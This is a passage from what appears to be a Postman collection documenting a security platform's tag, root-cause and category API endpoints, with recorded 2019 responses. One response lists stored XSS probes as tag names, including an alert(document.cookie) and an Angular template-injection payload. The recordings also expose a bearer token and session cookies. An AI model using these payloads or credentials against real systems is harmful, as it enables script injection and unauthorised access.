server"},{"key":"Set-Cookie","value":"JSESSIONID=node010bvi8x2pjknu8gv9az6q7f1f10078.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node012u4yw760ghropvkn1lhpaatz10079.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=dad760d0-5658-471e-b2cd-6e8cdce7ad34;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node012u4yw760ghropvkn1lhpaatz10079.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"dad760d0-5658-471e-b2cd-6e8cdce7ad34","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"content\":[{\"tag_id\":\"5d00e243c569d5589ce207ce\",\"tag_name\":\"c\"},{\"tag_id\":\"5d00e243c569d5589ce207cd\",\"tag_name\":\"b\"},{\"tag_id\":\"5d00e243c569d5589ce207cc\",\"tag_name\":\"a\"},{\"tag_id\":\"5ce7cec1c569d52c0f2d572c\",\"tag_name\":\"Verified\"},{\"tag_id\":\"5cd1ac9dc569d571d3afcc64\",\"tag_name\":\"setTimeout`alert\\\\x28document.cookie\\\\x29`\"},{\"tag_id\":\"5cb89c89c569d509f5a49096\",\"tag_name\":\"{{$on.constructor('alert(1)')()}}\"},{\"tag_id\":\"5cb0a233c569d512086a7015\",\"tag_name\":\"tag3\"},{\"tag_id\":\"5cb0a209c569d512086a6b7c\",\"tag_name\":\"tag2\"},{\"tag_id\":\"5cb0a209c569d512086a6b7b\",\"tag_name\":\"tag1\"},{\"tag_id\":\"5c8fd10ec569d56cc8dd5dae\",\"tag_name\":\"<img src= \\\"x\\\" alt=\\\"\\\" /> <scrirpt type \\\"text/javascript\\\">// <![CDATA[alert(1); // ]]></script>\"}],\"pageable\":{\"sort\":{\"sorted\":true,\"unsorted\":false},\"pageSize\":30,\"pageNumber\":0,\"offset\":0,\"paged\":true,\"unpaged\":false},\"totalPages\":1,\"totalElements\":10,\"last\":true,\"first\":true,\"sort\":{\"sorted\":true,\"unsorted\":false},\"numberOfElements\":10,\"size\":30,\"number\":0}"}],"_postman_id":"780fe17d-1634-4f47-8a8b-24cfc93f19c7"},{"name":"Tag by ID","id":"f1e8d708-e4c2-466b-9e37-dbca160de6b3","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":"https://<instance>/api/v1/tags/<tag_id>","description":"<p>This endpoint allows you to retrieve a single Tag, specifying its ID. If there is no active Tag with the specified ID, the server will respond with a 204: No Content.</p>\n","urlObject":{"protocol":"https","path":["api","v1","tags","<tag_id>"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"e810b98b-3d73-47e7-a41f-ea41b89f0b4f","name":"Try to get a wrong Tag","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":"https://instance/api/v1/tags/5cb0a209c569d51000000000"},"status":"No Content","code":204,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 14:29:02 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node013te21cx9vam1bwo9a1f9s15810080.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node086p7hfzg6j592th9qq674mwq10081.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=b83de11c-57c9-48c8-a753-1276edb8cd80;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node086p7hfzg6j592th9qq674mwq10081.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"b83de11c-57c9-48c8-a753-1276edb8cd80","key":"XSRF-TOKEN"}],"responseTime":null,"body":""},{"id":"766d97b5-ce1c-449d-879e-441b591358c4","name":"Get a Tag","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":"https://instance/api/v1/tags/5cb0a209c569d512086a6b7b"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 14:28:41 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node012u4yw760ghropvkn1lhpaatz10079.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node013te21cx9vam1bwo9a1f9s15810080.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=8c3eeadf-24fc-4f31-bd56-8d6c98416e8a;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node013te21cx9vam1bwo9a1f9s15810080.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"8c3eeadf-24fc-4f31-bd56-8d6c98416e8a","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"tag_id\":\"5cb0a209c569d512086a6b7b\",\"tag_name\":\"tag1\"}"}],"_postman_id":"f1e8d708-e4c2-466b-9e37-dbca160de6b3"}],"id":"8dc31a4a-a9b8-4e59-8009-f5de4dd82060","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"6e5fda20-b985-4f6d-a0b3-9b2777010eed"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"71773014-1b13-44bb-b690-293a5577c319"}}],"_postman_id":"8dc31a4a-a9b8-4e59-8009-f5de4dd82060","description":""},{"name":"Causas Raíz","item":[{"name":"Root Causes","id":"a286bebf-24dc-4f9c-bbab-b4864dfbf13c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"url":"https://<instance>/api/v1/knowledge-base/root-causes?size=30&page=0","description":"<p>This endpoint allows you to retrieve the active Root Causes on the database. It uses pagination, with parameters <strong>size</strong> and <strong>page</strong>. If none is specified, <strong>size</strong> will be 30 and <strong>page</strong> will be 0 by default. You can retrieve at most 200 records at once. If there are more than 200 Root Causes on the Database, you will need to get the remainder ones specifying the next <strong>pages</strong>.</p>\n","urlObject":{"protocol":"https","path":["api","v1","knowledge-base","root-causes"],"host":["<instance>"],"query":[{"description":{"content":"<p>[optional] How many results you want. Default is 30. Max is 200.</p>\n","type":"text/plain"},"key":"size","value":"30"},{"description":{"content":"<p>[optional] Which page you want to retrieve.</p>\n","type":"text/plain"},"key":"page","value":"0"}],"variable":[]}},"response":[{"id":"f3d9b4b9-fc54-4215-ae94-7cce90996522","name":"Get the first 30 Root Causes","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":{"raw":"https://instance/api/v1/knowledge-base/root-causes?size=30&page=0","protocol":"https","host":["instance"],"path":["api","v1","knowledge-base","root-causes"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200."},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 14:07:40 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node07h2olhobqn9e1273mpqb96cxf10066.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01d5a6ucgliai318kog5woh029a10067.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=da289703-1e49-40a0-ae7e-59ac6891a6c5;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01d5a6ucgliai318kog5woh029a10067.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"da289703-1e49-40a0-ae7e-59ac6891a6c5","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"content\":[{\"title\":\"Generic\",\"root_cause_id\":\"5ab9178fe12f5e05704b906e\"},{\"title\":\"Configuration Management\",\"root_cause_id\":\"5cad0edec569d524a08f6d09\"},{\"title\":\"Data Validation\",\"root_cause_id\":\"5cad0edec569d524a08f6d0f\"},{\"title\":\"Information Gathering\",\"root_cause_id\":\"5cad0edfc569d524a08f6d14\"},{\"title\":\"Authentication Management\",\"root_cause_id\":\"5cad0edfc569d524a08f6d21\"},{\"title\":\"Gestão de Identidades\",\"root_cause_id\":\"5cc36718c569d57711bf2ec6\"},{\"title\":\"Gestão de Continuidade de Negócios\",\"root_cause_id\":\"5cc36718c569d57711bf2ec9\"},{\"title\":\"Gestão de Controles Criptográficos\",\"root_cause_id\":\"5cc36718c569d57711bf2ecc\"},{\"title\":\"Programa de Conscientização\",\"root_cause_id\":\"5cc36718c569d57711bf2ed5\"},{\"title\":\"Gestão de Desenvolvimento Seguro\",\"root_cause_id\":\"5cc36718c569d57711bf2eda\"},{\"title\":\"Gestão de Ativos\",\"root_cause_id\":\"5cc36718c569d57711bf2edd\"},{\"title\":\"Gestão de Riscos\",\"root_cause_id\":\"5cc36719c569d57711bf2eec\"},{\"title\":\"Gestão da Contratação de Serviços em Nuvem\",\"root_cause_id\":\"5cc36719c569d57711bf2eef\"},{\"title\":\"Gestão de Vulnerabilidades\",\"root_cause_id\":\"5cc36719c569d57711bf2ef6\"},{\"title\":\"Gestão de Incidentes de SI\",\"root_cause_id\":\"5cc36719c569d57711bf2f09\"},{\"title\":\"Gestão de Conformidade\",\"root_cause_id\":\"5cc36719c569d57711bf2f0c\"},{\"title\":\"Governança de Segurança da Informação\",\"root_cause_id\":\"5cc36719c569d57711bf2f2c\"},{\"title\":\"Gestão de Fornecedores\",\"root_cause_id\":\"5cd2badcc569d573a2c18683\"},{\"title\":\"Account Leak\",\"root_cause_id\":\"5ce7cec1c569d52c0f2d5729\"}],\"pageable\":{\"sort\":{\"sorted\":true,\"unsorted\":false},\"pageSize\":30,\"pageNumber\":0,\"offset\":0,\"paged\":true,\"unpaged\":false},\"totalPages\":1,\"totalElements\":19,\"last\":true,\"first\":true,\"sort\":{\"sorted\":true,\"unsorted\":false},\"numberOfElements\":19,\"size\":30,\"number\":0}"}],"_postman_id":"a286bebf-24dc-4f9c-bbab-b4864dfbf13c"},{"name":"Root Cause by ID","id":"d973ab7e-815a-4a8d-becd-17df8a7bec5d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":"https://<instance>/api/v1/knowledge-base/root-causes/<root-cause_id>","description":"<p>This endpoint allows you to retrieve a single Root Cause, specifying its ID. If there is no active Root Cause with the specified ID, the server will respond with a 204: No Content.</p>\n","urlObject":{"protocol":"https","path":["api","v1","knowledge-base","root-causes","<root-cause_id>"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"9c695847-07dd-42fb-99ae-d41ccce8cd99","name":"Get a Root Cause","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":"https://instance/api/v1/knowledge-base/root-causes/5ab9178fe12f5e05704b906e"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 14:08:38 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01d5a6ucgliai318kog5woh029a10067.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01g1nucophyfu7mdicdvznzb8d10068.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=61745709-9ba5-4ffe-9188-633702cd22d9;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01g1nucophyfu7mdicdvznzb8d10068.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"61745709-9ba5-4ffe-9188-633702cd22d9","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"title\":\"Generic\",\"root_cause_id\":\"5ab9178fe12f5e05704b906e\"}"},{"id":"6e1ec5e7-054b-4c6c-905d-3f17704e7625","name":"Try to get a wrong Root Cause","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":"https://instance/api/v1/knowledge-base/root-causes/5ab9178fe12f5e0000000000"},"status":"No Content","code":204,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 14:12:27 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01g1nucophyfu7mdicdvznzb8d10068.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01uifi67b2jco31dvizhi5qxodp10069.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=55dcc721-b587-4b26-879b-47452ed5076c;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01uifi67b2jco31dvizhi5qxodp10069.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"55dcc721-b587-4b26-879b-47452ed5076c","key":"XSRF-TOKEN"}],"responseTime":null,"body":""}],"_postman_id":"d973ab7e-815a-4a8d-becd-17df8a7bec5d"}],"id":"27e79f3b-f480-447b-ac12-773869a330ce","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"9c5b9692-38bd-4c6b-ae6d-3863f78a2736"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"fba88eb8-75b5-452a-b698-a07547a96fbd"}}],"_postman_id":"27e79f3b-f480-447b-ac12-773869a330ce","description":""},{"name":"Categorias","item":[{"name":"Categories","id":"5bcc1440-507b-4af4-b2ce-5109b2929e23","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"url":"https://<instance>/api/v1/knowledge-base/categories?size=30&page=0","description":"<p>This endpoint allows you to retrieve the active Categories on the database. It uses pagination, with parameters <strong>size</strong> and <strong>page</strong>. If none is specified, <strong>size</strong> will be 30 and <strong>page</strong> will be 0 by default. You can retrieve at most 200 records at once. If there are more than 200 Categories on the Database, you will need to get the remainder ones specifying the next <strong>pages</strong>.</p>\n","urlObject":{"protocol":"https","path":["api","v1","knowledge-base","categories"],"host":["<instance>"],"query":[{"description":{"content":"<p>[optional] How many results you want. Default is 30. Max is 200.</p>\n","type":"text/plain"},"key":"size","value":"30"},{"description":{"content":"<p>[optional] Which page you want to retrieve.</p>\n","type":"text/plain"},"key":"page","value":"0"}],"variable":[]}},"response":[{"id":"c0d24f53-eb24-464c-8ff8-6e5160d69cc6","name":"Get the first 30 Categories","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":{"raw":"https://instance/api/v1/knowledge-base/categories?size=30&page=0","protocol":"https","host":["instance"],"path":["api","v1","knowledge-base","categories"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200."},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 14:02:35 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0j14twki20wuz1h5uoygpo9il210063.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0123nqt57gw7871t6nrb9l8v0j310064.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=64b63b6f-ab6d-4270-ba09-c32feca6350e;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if 